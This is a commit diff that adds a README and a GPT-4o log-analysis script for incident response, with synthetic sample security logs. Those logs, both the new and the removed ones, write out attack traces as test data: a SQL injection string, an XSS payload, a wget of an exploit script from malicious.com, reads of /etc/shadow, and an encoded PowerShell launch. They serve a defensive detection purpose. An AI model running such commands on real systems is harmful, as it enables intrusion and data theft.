The-Art-of-Hacking · santosomar · Sep 6, 2025 · Sep 6, 2025
diff --git a/ai_research/AI for Incident Response/README.md b/ai_research/AI for Incident Response/README.md
@@ -0,0 +1,101 @@
+# AI-Powered Log Analysis for Incident Response
+
+This tool uses OpenAI's GPT-4o model to analyze security logs and identify potential threats, malicious activities, and indicators of compromise (IOCs).
+
+## Features
+
+- **Modern OpenAI Client**: Updated to use the latest OpenAI Python client (v1+)
+- **Advanced AI Model**: Leverages GPT-4o for superior threat detection capabilities
+- **Structured Analysis**: Returns JSON-formatted results with threat levels, IOCs, and recommendations
+- **Comprehensive Detection**: Identifies various attack types including:
+  - Brute force attacks
+  - Privilege escalation attempts
+  - Malware indicators
+  - Suspicious network activity
+  - Anomalous user behavior
+- **Error Handling**: Robust error handling for file operations and API calls
+- **Flexible Input**: Supports command-line arguments for different log files
+
+## Installation
+
+1. Install required dependencies:
+```bash
+pip3 install openai python-dotenv
+```
+
+2. Set up your OpenAI API key:
+   - Create a `.env` file in the same directory
+   - Add your API key: `OPENAI_API_KEY=your_api_key_here`
+
+## Usage
+
+### Basic Usage
+```bash
+python analyzing_logs.py
+```
+This will analyze the default `logs.txt` file.
+
+### Custom Log File
+```bash
+python analyzing_logs.py /path/to/your/logfile.log
+```
+
+## Output Format
+
+The tool provides structured analysis including:
+
+- **Summary**: Brief overview of findings
+- **Threat Level**: LOW/MEDIUM/HIGH/CRITICAL
+- **Malicious Activity Detection**: Boolean indicator
+- **Detailed Findings**: Specific threats with severity levels and recommendations
+- **IOCs**: Extracted indicators including IPs, domains, file hashes, and user accounts
+- **Security Recommendations**: Actionable steps to improve security posture
+
+## Example Output
+
+```
+============================================================
+🔍 CYBERSECURITY LOG ANALYSIS RESULTS
+============================================================
+
+📊 SUMMARY: Multiple security threats detected including brute force attacks and malware
+🚨 THREAT LEVEL: HIGH
+⚠️  MALICIOUS ACTIVITY: YES
+
+🔎 DETAILED FINDINGS (3 items):
+
+  1. BRUTE_FORCE_ATTACK
+     Severity: HIGH
+     Description: Multiple failed login attempts from IP 203.0.113.45
+     Indicators: 203.0.113.45, failed_login_attempts
+     Recommendations: Block IP address; Implement account lockout policies
+
+🎯 INDICATORS OF COMPROMISE (IOCs):
+  Ip Addresses: 203.0.113.45, 198.51.100.25
+  Domains: suspicious-domain.evil.com
+  File Hashes: malicious_payload.exe
+
+💡 SECURITY RECOMMENDATIONS:
+  1. Implement stronger authentication mechanisms
+  2. Monitor network traffic for suspicious domains
+  3. Regular malware scanning and quarantine procedures
+```
+
+## Security Best Practices
+
+This tool follows cybersecurity best practices:
+- Secure API key management using environment variables
+- Structured output for integration with SIEM systems
+- Comprehensive threat categorization
+- Actionable security recommendations
+
+## Author
+
+Omar Santos (@santosomar)
+
+## Updates
+
+- **2024**: Updated to use OpenAI client v1+ with GPT-4o model
+- Enhanced error handling and structured JSON output
+- Improved cybersecurity-focused prompts and analysis
+- Added comprehensive IOC extraction and threat categorization
diff --git a/ai_research/AI for Incident Response/analyzing_logs.py b/ai_research/AI for Incident Response/analyzing_logs.py
@@ -1,38 +1,183 @@
 '''
-A simple test to interact with the OpenAI API
-and analyze logs from applications, firewalls, operating systems, and more.
+AI-powered log analysis for cybersecurity incident response
+Analyzes logs from applications, firewalls, operating systems, and more to detect malicious activity.
+Updated to use the latest OpenAI client (v1+) and GPT-4o model.
 Author: Omar Santos, @santosomar
 '''
 
 # Import the required libraries
 # pip3 install openai python-dotenv  
 # Use the line above if you need to install the libraries
 from dotenv import load_dotenv
-import openai
+from openai import OpenAI
 import os
+import json
+import sys
+from pathlib import Path
 
 # Load the .env file
 load_dotenv()
 
-# Get the API key from the environment variable
-openai.api_key = os.getenv('OPENAI_API_KEY')
+# Initialize the OpenAI client with the new v1+ syntax
+client = OpenAI(api_key=os.getenv('OPENAI_API_KEY'))
 
-# Read the diff from a file
-with open('logs.txt', 'r') as file:
-    log_file = file.read()
+def analyze_logs(log_file_path='logs.txt'):
+    """
+    Analyze security logs using GPT-4o to identify potential threats and malicious activity.
+
+    Args:
+        log_file_path (str): Path to the log file to analyze
+
+    Returns:
+        dict: Structured analysis results
+    """
+
+    # Check if log file exists
+    if not Path(log_file_path).exists():
+        print(f"Error: Log file '{log_file_path}' not found.")
+        return None
+
+    try:
+        # Read the log file
+        with open(log_file_path, 'r', encoding='utf-8') as file:
+            log_content = file.read()
+
+        if not log_content.strip():
+            print("Error: Log file is empty.")
+            return None
+
+        # Enhanced prompt for better cybersecurity analysis
+        system_prompt = """You are a cybersecurity expert specializing in log analysis and incident response. 
+        Analyze the provided logs and identify potential security threats, anomalies, and malicious activities.
+
+        Provide your analysis in the following JSON format:
+        {
+            "summary": "Brief overview of findings",
+            "threat_level": "LOW/MEDIUM/HIGH/CRITICAL",
+            "malicious_activity_detected": true/false,
+            "findings": [
+                {
+                    "type": "threat_type",
+                    "severity": "LOW/MEDIUM/HIGH/CRITICAL", 
+                    "description": "detailed description",
+                    "indicators": ["list of IOCs or suspicious patterns"],
+                    "recommendations": ["list of recommended actions"]
+                }
+            ],
+            "iocs": {
+                "ip_addresses": ["suspicious IPs"],
+                "domains": ["suspicious domains"],
+                "file_hashes": ["suspicious file hashes"],
+                "user_accounts": ["suspicious user accounts"]
+            },
+            "recommendations": ["overall security recommendations"]
+        }"""
+
+        user_prompt = f"""Analyze the following security logs for potential threats and malicious activity:
 
-# Prepare the prompt
-prompt = [{"role": "user", "content": f"Explain the following logs:\n\n{log_file} . Explain if there is any malicious activity in the logs."}]
+{log_content}
 
-# Generate the AI chat completion via the OpenAI API
-# I am only using GTP 3.5 Turbo for this example.
-response = openai.ChatCompletion.create(
-  model="gpt-3.5-turbo-16k",
-  messages=prompt,
-  max_tokens=10000
-)
+Focus on:
+- Failed authentication attempts and brute force attacks
+- Unusual network connections or data transfers
+- Privilege escalation attempts
+- Malware indicators or suspicious file activities
+- Anomalous user behavior patterns
+- System compromise indicators"""
 
-# print the response from the OpenAI API
-print(response.choices[0].message.content)
+        # Generate the AI analysis using the latest OpenAI client
+        response = client.chat.completions.create(
+            model="gpt-4o",  # Using GPT-4o as it's the latest available model
+            messages=[
+                {"role": "system", "content": system_prompt},
+                {"role": "user", "content": user_prompt}
+            ],
+            max_tokens=4000,
+            temperature=0.1,  # Lower temperature for more consistent analysis
+            response_format={"type": "json_object"}  # Ensure JSON response
+        )
+
+        # Parse the response
+        analysis_result = json.loads(response.choices[0].message.content)
+
+        return analysis_result
+
+    except FileNotFoundError:
+        print(f"Error: Could not find log file '{log_file_path}'")
+        return None
+    except json.JSONDecodeError as e:
+        print(f"Error: Failed to parse AI response as JSON: {e}")
+        print("Raw response:", response.choices[0].message.content)
+        return None
+    except Exception as e:
+        print(f"Error during log analysis: {e}")
+        return None
+
+def print_analysis_results(analysis):
+    """
+    Print the analysis results in a formatted, readable way.
+
+    Args:
+        analysis (dict): The analysis results from analyze_logs()
+    """
+    if not analysis:
+        return
+
+    print("=" * 60)
+    print("🔍 CYBERSECURITY LOG ANALYSIS RESULTS")
+    print("=" * 60)
+
+    print(f"\n📊 SUMMARY: {analysis.get('summary', 'N/A')}")
+    print(f"🚨 THREAT LEVEL: {analysis.get('threat_level', 'UNKNOWN')}")
+    print(f"⚠️  MALICIOUS ACTIVITY: {'YES' if analysis.get('malicious_activity_detected') else 'NO'}")
+
+    # Print findings
+    findings = analysis.get('findings', [])
+    if findings:
+        print(f"\n🔎 DETAILED FINDINGS ({len(findings)} items):")
+        for i, finding in enumerate(findings, 1):
+            print(f"\n  {i}. {finding.get('type', 'Unknown').upper()}")
+            print(f"     Severity: {finding.get('severity', 'Unknown')}")
+            print(f"     Description: {finding.get('description', 'N/A')}")
+
+            indicators = finding.get('indicators', [])
+            if indicators:
+                print(f"     Indicators: {', '.join(indicators)}")
+
+            recommendations = finding.get('recommendations', [])
+            if recommendations:
+                print(f"     Recommendations: {'; '.join(recommendations)}")
+
+    # Print IOCs
+    iocs = analysis.get('iocs', {})
+    if any(iocs.values()):
+        print(f"\n🎯 INDICATORS OF COMPROMISE (IOCs):")
+        for ioc_type, values in iocs.items():
+            if values:
+                print(f"  {ioc_type.replace('_', ' ').title()}: {', '.join(values)}")
+
+    # Print overall recommendations
+    recommendations = analysis.get('recommendations', [])
+    if recommendations:
+        print(f"\n💡 SECURITY RECOMMENDATIONS:")
+        for i, rec in enumerate(recommendations, 1):
+            print(f"  {i}. {rec}")
+
+    print("\n" + "=" * 60)
+
+if __name__ == "__main__":
+    # Allow specifying log file as command line argument
+    log_file = sys.argv[1] if len(sys.argv) > 1 else 'logs.txt'
+
+    print(f"🔍 Analyzing log file: {log_file}")
+    print("🤖 Using GPT-4o for AI-powered threat detection...")
+
+    # Perform the analysis
+    results = analyze_logs(log_file)
+
+    if results:
+        print_analysis_results(results)
+    else:
+        print("❌ Analysis failed. Please check the log file and try again.")
 
 
diff --git a/ai_research/AI for Incident Response/logs.txt b/ai_research/AI for Incident Response/logs.txt
@@ -1,12 +1,19 @@
-[2026-08-18 12:34:56] Failed login attempt for user 'admin' from IP 192.168.1.10
-[2026-08-18 12:34:57] Failed login attempt for user 'admin' from IP 192.168.1.10
-[2026-08-18 12:34:58] Failed login attempt for user 'admin' from IP 192.168.1.10
-[2026-08-18 13:45:23] SQL query error: SELECT * FROM users WHERE username='' OR '1'='1'; -- ' AND password='password'
-[2026-08-18 14:56:12] GET /login HTTP/1.1 User-Agent: Possible-Scanning-Bot/1.0
-[2026-08-18 15:23:45] GET /admin/dashboard HTTP/1.1 from IP 203.0.113.5
-[2026-08-18 16:34:12] Command executed: /bin/bash -c 'wget http://malicious.com/exploit.sh'
-[2026-08-18 17:45:23] GET /etc/passwd HTTP/1.1 from IP 192.168.1.20
-[2026-08-18 18:56:34] 1000 requests received from IP 192.168.1.30 in the last 60 seconds
-[2026-08-18 19:12:45] GET /search?q=<script>alert('XSS')</script> HTTP/1.1
-[2026-08-18 20:23:56] Connection attempt to port 4444 from IP 192.168.1.40
-[2026-08-18 21:34:12] GET /downloads/malicious.exe HTTP/1.1 from IP 192.168.1.50
+2029-01-15 10:23:45 [INFO] User admin logged in from 192.168.1.100
+2029-01-15 10:24:12 [INFO] File access: /etc/passwd by user admin
+2029-01-15 10:25:33 [WARN] Failed login attempt for user root from 203.0.113.45
+2029-01-15 10:25:45 [WARN] Failed login attempt for user root from 203.0.113.45
+2029-01-15 10:25:58 [WARN] Failed login attempt for user root from 203.0.113.45
+2029-01-15 10:26:12 [WARN] Failed login attempt for user admin from 203.0.113.45
+2029-01-15 10:26:25 [WARN] Failed login attempt for user admin from 203.0.113.45
+2029-01-15 10:27:01 [ERROR] Brute force attack detected from IP 203.0.113.45
+2029-01-15 10:27:15 [INFO] IP 203.0.113.45 blocked by firewall
+2029-01-15 10:30:22 [INFO] User admin executed sudo command: /bin/cat /etc/shadow
+2029-01-15 10:31:45 [WARN] Unusual network traffic detected to suspicious-domain.evil.com
+2029-01-15 10:32:10 [INFO] DNS query for suspicious-domain.evil.com from 192.168.1.100
+2029-01-15 10:33:22 [WARN] Large data transfer detected: 500MB to 198.51.100.25
+2029-01-15 10:35:15 [ERROR] Malware signature detected in file: /tmp/malicious_payload.exe
+2029-01-15 10:35:30 [INFO] File quarantined: /tmp/malicious_payload.exe
+2029-01-15 10:36:45 [WARN] Process spawned with suspicious arguments: powershell.exe -enc <base64_encoded_command>
+2029-01-15 10:37:12 [INFO] User admin logged out
+2029-01-15 10:45:33 [INFO] System backup completed successfully
+2029-01-15 11:00:15 [INFO] Regular system maintenance started